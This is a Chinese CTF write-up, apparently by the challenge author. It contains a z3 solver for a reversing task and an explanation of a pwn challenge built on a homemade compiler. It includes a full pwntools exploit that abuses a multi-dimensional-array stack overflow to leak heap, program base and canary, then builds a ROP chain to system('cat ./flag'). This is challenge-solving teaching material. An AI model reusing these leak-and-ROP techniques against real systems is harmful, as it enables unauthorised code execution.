e2.key[8]=447;
e2.key[9]=474;
e2.key[10]=577;
e2.key[11]=454;
e2.key[12]=466;
e2.key[13]=345;
e2.key[14]=344;
e2.key[15]=486;
e2.key[16]=501;
e2.key[17]=423;
e2.key[18]=490;
e2.key[19]=375;
e2.key[20]=257;
e2.key[21]=203;
e2.key[22]=265;
e2.key[23]=125;

for(i=0;i<8;i++){
x = i + i + i;
kx = e1.key[x];
e2.X[i] = kx;
}

for(i=23;i>0;i--){
y = i;
ky = e2.key[y];
x = i;
x -= 1;
kx = e2.key[x];
kz = ky - kx;
e2.key[i] = kz;
}

for(i=0;i<8;i++){
x = e1.L[i];
y = e1.R[i];
z = e2.X[i];
kx = e2.key[x];
ky = e2.key[y];
kx -= z;
ky += z;
e2.key[x] = kx;
e2.key[y] = ky;
}

for(i=1;i<24;i++){
kx = e2.key[i];
x = i-1;
z = e2.key[x];
kx += z;
e2.key[i] = kx;
}

下面是公式推导的过程:

通过 z3 即可求解 flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# -*- coding:utf-8 -*-
from z3 import *

# One symbolic integer per flag character (24 characters in total).
s = [Int('S' + str(i)) for i in range(24)]
x = Solver()

# One linear equation per position, numbered by the comment above it.
# 0
x.add(s[0]+s[0]+22 == 252)
# 1
x.add(s[0]+s[18]+s[1]+23 == 352)
# 2
x.add(s[0]+s[18]+s[6]+s[2]+85 == 484)
# 3
x.add(s[0]+s[18]+s[6]+s[3]+85 == 470)
# 4
x.add(s[0]+s[18]+s[6]+s[21]+s[4]+35 == 496)
# 5
x.add(s[0]+s[18]+s[6]+s[21]+s[5]+35 == 487)
# 6
x.add(s[0]+s[18]+s[6]+s[21]+s[12]+s[6]+27 == 539)
# 7
x.add(s[0]+s[18]+s[6]+s[21]+s[12]+s[7]+27 == 585)
# 8
x.add(s[18]+s[6]+s[21]+s[12]+s[8]+5 == 447)
# 9
x.add(s[18]+s[6]+s[21]+s[12]+s[15]+s[9]-91 == 474)
# 10
x.add(s[18]+s[6]+s[21]+s[12]+s[15]+s[9]+s[10]-105 == 577)
# 11
x.add(s[18]+s[21]+s[12]+s[15]+s[9]+s[11]-167 == 454)
# 12
x.add(s[18]+s[21]+s[12]+s[15]+s[9]+s[12]-167 == 466)
# 13
x.add(s[18]+s[21]+s[15]+s[9]+s[13]-159 == 345)
# 14
x.add(s[18]+s[21]+s[15]+s[9]+s[14]-159 == 344)
# 15
x.add(s[18]+s[21]+s[15]+s[9]+s[3]+s[15]-113 == 486)
# 16
x.add(s[18]+s[21]+s[15]+s[9]+s[3]+s[16]-113 == 501)
# 17
x.add(s[18]+s[15]+s[9]+s[3]+s[17]-63 == 423)
# 18
x.add(s[18]+s[15]+s[9]+s[3]+s[18]-63 == 490)
# 19
x.add(s[15]+s[9]+s[3]+s[19]-64 == 375)
# 20
x.add(s[15]+s[3]+s[20]-50 == 257)
# 21
x.add(s[3]+s[21]+46 == 203)
# 22
x.add(s[3]+s[22]+46 == 265)
# 23
x.add(s[23] == 125)

# Asking for a model when the system is not satisfiable raises inside z3,
# so stop with a clear message instead.
if x.check() != sat:
    raise SystemExit("constraints are not satisfiable; no flag recovered")

model = x.model()
print(model)

# Read every character straight from the model rather than parsing the
# printed form of the model, which depends on z3's output formatting.
flag = ''.join(chr(model[s[i]].as_long()) for i in range(24))

print(flag)

Compiler 出题思路

本题目是一个我自己写的编译器,将其包装成菜单,并提供了以下4个功能:

1
2
3
4
5
1.get IR
2.get asm
3.get bin
4.input code
5.exit
  • 获取中间代码
  • 获取汇编代码
  • 获取二进制文件
  • 输入源代码

由于 “获取汇编代码” 这个功能会被逆向题目 SycLang 利用,于是本题目不提供 trans_asm 文件

1
2
3
4
5
6
7
8
9
10
case 2u:
sub_CB6A("translation Three-address-codes to Assemble-code");
system("./trans_asm");
sub_CB6A("done: get demo.s");
break;
case 3u:
sub_CB6A("translation Assemble-code to Binary-code");
system("gcc demo.s -o demo");
sub_CB6A("done: get demo");
break;
  • PS:这里偷个懒,后端直接就是 gcc,同时这里也提供了 system 函数

漏洞分析

本题目有两处溢出:

本题目在词法分析的过程中,对符号的长度和数目没有限制,但符号表却非常长,在这里进行入侵不太现实

1
2
3
4
5
6
7
8
9
.bss:0000000000020001 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+qword_20001 dq 30DBh dup(?)                         ; 0
.bss:0000000000020001 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+ ; DATA XREF: .rodata:off_13000↑o
.bss:00000000000386D9 ?? db ? ;
.bss:00000000000386DA ?? db ? ;
.bss:00000000000386DB ?? db ? ;
.bss:00000000000386DC ?? db ? ;
.bss:00000000000386DD ?? db ? ;
.bss:00000000000386DE ?? db ? ;
.bss:00000000000386DF ?? db ? ;

另外一处就是位于多级数组处理的栈溢出:

1
2
3
4
5
sub_427C(*(_QWORD *)(*(_QWORD *)(v15 + 104) + 96LL));
if ( **(_DWORD **)(*(_QWORD *)(v15 + 104) + 96LL) == 258 )
{
v18[v10++] = *(_DWORD *)(*(_QWORD *)(*(_QWORD *)(v15 + 104) + 96LL) + 40LL);
}
  • 这里原本的逻辑就是记录多级数组每一级的容量,如果多级数组的级数过多就会发生栈溢出
1
2
char v18[6]; // [rsp+4Ah] [rbp-16h]
void *v19; // [rsp+50h] [rbp-10h]
  • 这里的 v19 是一个结构体指针,其目的是为了记录以变量为索引的数组(例如:arr[i] 中的 i 就会被进行记录)

下面是这个结构体的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Value carried by a symbol record. All members share the same storage. */
union Value {
char type_id[32];
int type_int;
float type_float;
char type_char;
char type_string[32];
};

/*
 * Linked-list node that records an array index given as a variable
 * (for example the `i` in arr[i]).
 */
struct Array
{
int kind;
int index;
size_t offset;
union Value value;
/* Name of the symbol; this is the field that gets printed in diagnostics and IR output. */
char name[32];
/* Next record in the list. */
struct Array *next;
};
  • Array->name 存储有该符号的名称,它可以在多个地方被打印

由于栈溢出,v19 可以被覆盖低位,进而将 Array->name 控制为我们需要的值

本程序有两处地方可供泄露:

当 Array->name 与符号表中的所有符号都不匹配时,就会发出报错:

1
2
3
4
5
6
v13 = sub_33AB(v14 + 48);
if ( v13 == -1 )
{
sub_3373(*(unsigned int *)(*(_QWORD *)(a1 + 96) + 200LL), v14 + 48, "未定义,语义错误");
return __readfsqword(0x28u) ^ v16;
}
  • 在报错中会输出该符号的名称 Array->name

当 Array->name 与符号表中任意一个符号匹配时,就会将其输出:

1
2
3
4
for ( i = 0; i < *(_DWORD *)(v11 + 4) - 1; ++i )
qword_19180 *= byte_19310[128 * (__int64)v7 + *(_DWORD *)(v11 + 4) - i];
sprintf(byte_190E0, "{#%d}*{%s<+%d>}+", qword_19180, (const char *)(v11 + 16), *(_QWORD *)(v11 + 8));
strcat(dest, byte_190E0);

入侵思路

先通过栈溢出覆盖 Array 指针的低位,控制 Array->name 指向一个堆地址,进而泄露 heap_base

本程序在拷贝数据时没有进行初始化,因此有部分栈上的数据被拷贝到堆中,这些数据都可以通过 Array->name 进行泄露

1
2
3
4
5
6
7
pwndbg> canary 
canary : 0x2ece71e5ac86af00
pwndbg> search -t qword 0x2ece71e5ac86af00
Searching for value: b'\x00\xaf\x86\xac\xe5q\xce.'
[heap] 0x55f0ee3be940 0x2ece71e5ac86af00
[heap] 0x55f0ee3be9f8 0x2ece71e5ac86af00
[heap] 0x55f0ee3bea30 0x2ece71e5ac86af00

获取 heap_base 后,就可以将 Array->name 指向更大范围的堆空间,进而泄露 pro_base,canary

最后利用现成的 system 布置一个 ROP 就结束了

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
# -*- coding:utf-8 -*-
from pwn import *

# Target description: word size of the binary and path to the challenge file.
arch = 64
challenge = './trans_IR'

context.os = 'linux'
#context.log_level = 'debug'
# Pick the pwntools architecture that matches the target word size.
if arch == 64:
    context.arch = 'amd64'
elif arch == 32:
    context.arch = 'i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

# Short aliases around the global tube `p` (created further down the script).
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: `lg` eval()s its argument to look a variable up by name; only ever
# pass it literal names written in this script.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak to 4 / 8 bytes before unpacking it.  The fill must be
# the single byte b'\x00'; the backslash had been lost, which made ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# local = 1 starts the challenge binary as a subprocess; 0 connects to the
# remote service instead.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.77.77', '2102')

def debug():
    """Attach GDB to `p` with a breakpoint at $rebase(0x72EC), then pause."""
    gdb.attach(p,"b *$rebase(0x72EC)\n")
    pause()

def cmd(op):
    """Wait for the end of the menu ("5.exit") and send choice `op` as a line."""
    sla("5.exit",str(op))

def _le_bytes(value, count):
    """Return the `count` lowest bytes of `value`, least-significant byte first."""
    return [(value >> (8 * i)) % 256 for i in range(count)]


# Stage 1: a 7-level array access overflows the per-level capacity buffer and
# overwrites the low byte of the adjacent Array pointer, so the name printed
# in the "line 6" diagnostic is read from the heap -> heap address leak.
code = """
int main(){
int a;
struct test t;
int arr[255][255][255][255][255][255][255];
arr[32][255][255][255][255][255][a]=0;
}
"""

cmd(4)
sla("input code:",code)
cmd(1)

p.recvuntil("第6行:")
# The fill must be bytes: padding a bytes object with a str raises on Python 3.
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
heap_base = leak_addr - 0xa970
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

# Stage 2: same trick with a different low byte (48) to leak a pointer into
# the program image and derive its load base.
code = """
int main(){
int a;
struct test t;
int arr[255][255][255][255][255][255][255];
arr[48][255][255][255][255][255][a]=0;
}
"""

cmd(4)
sla("input code:",code)
cmd(1)

p.recvuntil("第6行:")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
pro_base = leak_addr - 0xa10a
success("leak_addr >> "+hex(leak_addr))
success("pro_base >> "+hex(pro_base))

bss_addr = pro_base + 0x19040 + 0x200
system = pro_base + 0xCD92
pop_rdi = pro_base + 0x00000000000125b3
success("system >> "+hex(system))
success("pop_rdi >> "+hex(pop_rdi))

# Heap location of a stale copy of the stack canary.  The +1 skips the
# canary's zero low byte so that the %s-style print does not stop at once.
# NOTE(review): the 0x30 adjustment presumably accounts for the offset of
# `name` inside the Array record - confirm.
stack_heap = heap_base + 0x11f20 +1-0x30
success("stack_heap >> "+hex(stack_heap))

#debug()

stack_heaps = _le_bytes(stack_heap, 6)
print(stack_heaps)

# Stage 3: overwrite the three low bytes of the Array pointer to leak the canary.
code = """
int main(){
int a;
struct test t;
int arr[255][255][255][255][255][255][255][255][255];
arr[%s][%s][%s][255][255][255][255][255][a]=0;
}
""" % (stack_heaps[2],stack_heaps[1],stack_heaps[0])

cmd(4)
sla("input code:",code)
cmd(1)

p.recvuntil("第6行:")
leak_addr = u64(p.recv(7).ljust(8,b"\x00"))
# Restore the zero low byte that was skipped when leaking.
canary_stack = leak_addr * 0x100

success("leak_addr >> "+hex(leak_addr))
success("canary_stack >> "+hex(canary_stack))

# Split every 64-bit value into single bytes: each array index written by the
# overflow supplies exactly one byte.
canary_stacks = _le_bytes(canary_stack, 8)
print(canary_stacks)

bss_addrs = _le_bytes(bss_addr, 8)
print(bss_addrs)

systems = _le_bytes(system, 8)
print(systems)

pop_rdis = _le_bytes(pop_rdi, 8)
print(pop_rdis)

# Submit a program whose text contains the command to run.
# NOTE(review): `binsh` below presumably points at the copy of "cat ./flag"
# that this submission leaves on the heap - confirm the 0x199fe offset.
code = """
int main(){
cat ./flag;
}
"""

cmd(4)
sla("input code:",code)
cmd(1)

binsh = heap_base +0x199fe
binshs = _le_bytes(binsh, 8)
print(binshs)

#debug()

# Final stage: the indices are consumed most-significant byte first, in the
# order system, command string, pop-rdi gadget, eight zero bytes, canary,
# bss address - the same order as the original hand-written tuple.
rop_bytes = (systems[::-1] + binshs[::-1] + pop_rdis[::-1]
             + canary_stacks[::-1] + bss_addrs[::-1])

code = """
int main(){
int arr[255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255];
arr[%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][0][0][0][0][0][0][0][0][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][255][255][255][255][255][255]=0;
}
""" % tuple(rop_bytes)

cmd(4)
sla("input code:",code)
cmd(1)

p.interactive()

出这个题目之前正好在学编译原理,我当时在做编译器 Lab 的时候就遇到了溢出的相关问题,于是就干脆把我做 Lab 时写的编译器拿出来改了改,弄了个 pwn 出来